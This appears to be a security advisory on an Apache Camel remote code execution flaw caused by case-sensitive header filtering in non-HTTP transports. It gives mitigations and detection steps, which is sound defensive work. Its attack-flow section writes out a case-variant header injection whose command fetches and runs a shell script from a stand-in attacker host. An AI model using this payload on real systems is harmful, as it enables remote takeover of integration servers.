Executive Summary
A critical remote code execution vulnerability (CVE-2026-40453, CVSS 9.9) has been disclosed in Apache Camel, the widely deployed open-source enterprise integration framework. The flaw represents an incomplete fix for a prior vulnerability, CVE-2025-27636, which added setLowerCase(true) to HttpHeaderFilterStrategy to block case-variant header injection (e.g., CAmelExecCommandExecutable instead of CamelExecCommandExecutable). However, the same lower-casing fix was not applied to five other HeaderFilterStrategy implementations in non-HTTP components, leaving those pathways fully exploitable.
An unauthenticated remote attacker with network access to a Camel endpoint can craft a JMS, AMQP, MQTT, or other non-HTTP message with a case-variant CamelExec* header to execute arbitrary operating system commands on the target host.
Background: CVE-2025-27636
To understand CVE-2026-40453, context on the prior vulnerability is essential.
CVE-2025-27636 was a critical Apache Camel vulnerability that allowed attackers to inject CamelExecCommandExecutable headers into HTTP messages processed by the camel-exec component, causing Camel to execute attacker-controlled OS commands. The fix introduced setLowerCase(true) on HttpHeaderFilterStrategy so that any case variant of a Camel* header name would be normalized to lowercase before the filter evaluated it — preventing bypasses via CAmelExecCommandExecutable, CAMELEXECCOMMANDEXECUTABLE, etc.
The oversight: the same setLowerCase(true) fix was not applied to five parallel HeaderFilterStrategy implementations serving non-HTTP transports.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-40453 |
| CVSS Score | 9.9 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Changed |
| Confidentiality / Integrity / Availability Impact | High / High / High |
| Root Cause | Incomplete patch — setLowerCase(true) missing from 5 non-HTTP filter strategies |
| Patch Available | Yes — see Apache advisory |
| Published | April 27, 2026 |
Affected Components
Five HeaderFilterStrategy implementations outside of HttpHeaderFilterStrategy were not updated with the case-normalization fix:
| Class | Transport / Component |
|---|---|
DefaultHeaderFilterStrategy | Camel core — default for many components |
JmsHeaderFilterStrategy | camel-jms |
AmqpHeaderFilterStrategy | camel-amqp |
MqttHeaderFilterStrategy | camel-mqtt / camel-paho |
| Additional component-specific strategy | (per advisory — exact name TBD) |
Any Camel route that accepts messages from an external source over JMS, AMQP, MQTT, or other non-HTTP transports and processes them through a camel-exec component is potentially exploitable.
Technical Analysis
Root Cause
Apache Camel's header filter pipeline normalizes incoming message header names before evaluating them against blocklists. The critical security check prevents CamelExecCommandExecutable (and similar Camel* execution headers) from being passed through to the camel-exec component.
setLowerCase(true) on the filter strategy ensures that:
CamelExecCommandExecutable→camelexeccommandexecutable(blocked)CAmelExecCommandExecutable→camelexeccommandexecutable(blocked)- Any case variant → normalized, blocked
Without setLowerCase(true):
CamelExecCommandExecutable→ blocked (exact match)CAmelExecCommandExecutable→ passes through (case mismatch — not in blocklist)
The five non-HTTP strategies use case-sensitive matching, meaning any case-variant CamelExec* header name evades the filter.
Attack Flow
1. Attacker identifies a Camel route consuming from a JMS/AMQP/MQTT broker
that routes messages through camel-exec or a similar execution component
2. Attacker publishes a message to the broker with header:
CAmelExecCommandExecutable: /bin/bash
CAmelExecCommandArgs: -c "curl attacker.com/shell.sh | bash"
3. Camel's non-HTTP HeaderFilterStrategy processes the header
- Case-sensitive blocklist check: "CAmelExecCommandExecutable" ≠ "CamelExecCommandExecutable"
- Header is NOT filtered out
4. Camel-exec receives the header and executes:
/bin/bash -c "curl attacker.com/shell.sh | bash"
5. Attacker achieves arbitrary OS command execution as the Camel process userWhy CVSS 9.9
The CVSS score reaches 9.9 (slightly above 9.8) due to the Scope: Changed metric. Successful exploitation affects not just the Camel process itself but any resources and downstream systems accessible from the compromised host, increasing the overall blast radius beyond the vulnerable component boundary.
| Metric | Value | Reason |
|---|---|---|
| AV: Network | N | Reachable over any network-accessible message broker |
| AC: Low | L | No race conditions or special configuration required |
| PR: None | N | No credentials needed to publish to the broker (in typical deployments) |
| UI: None | N | Fully automated exploitation — no human interaction |
| Scope: Changed | C | Compromise extends beyond the vulnerable Camel process |
| C/I/A: High | H/H/H | Full OS command execution = full system compromise |
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Arbitrary OS commands execute as the Camel service account |
| Data Exfiltration | Access to all data visible to the Camel process (databases, file shares, secrets) |
| Lateral Movement | Camel often has broad network access to internal message brokers and enterprise systems |
| Persistence | Attacker can install backdoors, cron jobs, or modify Camel route definitions |
| Supply Chain Risk | Camel is embedded in many enterprise integration platforms (Apache ServiceMix, Red Hat Fuse, etc.) |
| Downstream Systems | Camel routes frequently connect to databases, ERP systems, and cloud APIs |
Apache Camel is widely deployed in enterprise environments for system integration, data pipelines, and microservice orchestration. The combination of broad network reachability and deep access to integrated systems makes this vulnerability particularly severe.
Remediation
Step 1: Upgrade Apache Camel
Apply the patched version released in the Apache advisory. The fix applies setLowerCase(true) to all five affected HeaderFilterStrategy implementations.
<!-- Maven — update camel BOM to patched version -->
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-bom</artifactId>
<version>PATCHED_VERSION</version>
<type>pom</type>
<scope>import</scope>
</dependency># Gradle — update camel version
./gradlew dependencies | grep camel
# Update camelVersion in build.gradle to patched releaseStep 2: Immediate Mitigations (If Patching Is Delayed)
Option A — Custom Header Filter
Override the HeaderFilterStrategy on affected routes to explicitly lower-case all incoming header names before evaluation:
public class SafeHeaderFilterStrategy extends DefaultHeaderFilterStrategy {
public SafeHeaderFilterStrategy() {
setLowerCase(true); // Apply the missing fix manually
}
}Register the custom strategy on your Camel routes:
JmsComponent jms = JmsComponent.jmsComponentAutoAcknowledge(connectionFactory);
jms.setHeaderFilterStrategy(new SafeHeaderFilterStrategy());
camelContext.addComponent("jms", jms);Option B — Block CamelExec Headers at the Broker
Configure your message broker (ActiveMQ, RabbitMQ, IBM MQ) to strip any header containing the string camelexec (case-insensitive) before delivery to Camel consumers.
Option C — Disable camel-exec If Not Required
If your routes do not require OS command execution, remove the camel-exec dependency entirely from your deployment.
Step 3: Audit for Compromise Indicators
# Search Camel application logs for case-variant CamelExec headers
grep -i "camelexec" /var/log/camel/*.log | grep -v "CamelExecCommandExecutable"
# Check for unexpected child processes spawned by the Camel JVM
ps auxf | grep -A5 -i java | grep -v grep
# Review broker message logs for suspicious header injection attempts
# (ActiveMQ example)
grep -i "camelexec" /opt/activemq/data/audit.logDetection Indicators
| Indicator | Description |
|---|---|
Case-variant Camel* headers in broker logs | Exploitation probe or active attack |
| Unexpected child processes from Java/Camel PID | Successful OS command execution |
| Outbound connections to unknown IPs from Camel host | Reverse shell or C2 communication |
| New cron jobs or systemd units on the Camel host | Post-exploitation persistence |
| File system changes in Camel working directory | Payload staging or webshell deployment |
Post-Remediation Checklist
- Upgrade all Apache Camel deployments to the patched version
- Verify the upgraded version applies
setLowerCase(true)in all five affected strategies - Audit message broker logs for case-variant
CamelExec*header injection attempts - Inspect Camel host file systems and process trees for indicators of compromise
- Rotate all credentials and API keys accessible to the Camel process user
- Harden message broker access — restrict which hosts can publish to consumer queues
- Review Camel route definitions for any
camel-execusages that could be removed - Apply custom header filter workaround on routes that cannot be immediately upgraded
- Monitor Camel application logs for anomalous header values going forward